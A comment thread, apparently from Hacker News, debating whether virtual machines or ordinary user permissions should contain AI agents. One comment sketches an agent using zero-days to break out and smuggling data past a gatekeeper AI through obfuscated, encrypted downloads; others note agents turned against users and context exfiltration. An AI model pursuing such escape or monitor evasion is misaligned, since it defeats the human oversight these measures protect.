| ▲ | athrowaway3z 4 days ago | ||||||||||||||||
I don't see the case for, what IMO is, more complexity by creating a virtual machine. We have user accounts, Read/Write/Exec for User/Groups. Read can grant access tokens which solves temporary+remote requirements. Every other capabilities model can be defined in those terms. I'd much rather see a simplification of the tools already available, then re-inventing another abstract machine / protocol. I hope we'll eventually get a fundamental shift in the approach to software as a whole. Currently, everybody is still experimenting with building more new stuff, but it is also a great opportunity to re-evaluate and, at acceptable cost, try to strip out all the cruft and reduce something to its simplest form. For example - I found an MCP server I liked. Told Claude to remove all the mcp stuff and put it into a CLI. Now I can just call that tool (without paying the context cost). Took me 10 minutes. I doubt, Claude is smart enough to build it back in without heavy guidance. | |||||||||||||||||
| ▲ | cosmic_cheese 4 days ago | parent | next [-] | ||||||||||||||||
In general the security model of desktop operating systems is woefully inadequate for the modern era. Given the sheer volume of software known to do things not in the user’s best interest it’s borderline insanity that we hand it the keys to the kingdom without so much as a second thought with such frequency. Of course if the user truly desires a zero-guardrail experience they should be able to get that, but it probably shouldn’t be the default. Software should be on a very short leash until the user has indicated trust, and even then privileges should be granted only on a per-domain basis. A program designed to visually represent disk usage will need full filesystem access for example, but there’s no reason it should be able to sniff around on my local network (or on platforms where package managers handle updates, connect to the internet at all). | |||||||||||||||||
| |||||||||||||||||
| ▲ | CuriouslyC 4 days ago | parent | prev | next [-] | ||||||||||||||||
Virtual machines contain the blast radius. A good agent will be able to take advantage of zero days from within your system to crack you no problem, being a user makes this really easy. You'd have to carefully firewall its knowledge, but there are so many ways to get stuff on the internet (i.e. ask to download an encrypted version of the file in an obfuscated way from a service that can get past the gatekeeper AI). These things are going to be scary good at cracking systems, trust me, you are going to want things to be ironclad. | |||||||||||||||||
| ▲ | jondwillis 4 days ago | parent | prev | next [-] | ||||||||||||||||
I’m with you for the most part. A lot of, but certainly not all or the security risks are present regardless of whether or not you’re in a VM. I think defense in depth will eventually matter more, but there are a LOT of low-hanging fruit for attackers right now when it comes to turning AI agents against their users, which is what I think you’re alluding to! | |||||||||||||||||
| ▲ | daxfohl 4 days ago | parent | prev | next [-] | ||||||||||||||||
There's no such thing as a temporary read in LLM land though. Once it's in context, you have to assume everything else connected to the agent will be able to exfiltrate it until the agent is killed and the context wiped. Note, this is the case whether running in VM or not, so I agree that VM is not a security solution. | |||||||||||||||||
| ▲ | EnPissant 4 days ago | parent | prev [-] | ||||||||||||||||
Once you have a tool to edit files, you pretty much lose all security. | |||||||||||||||||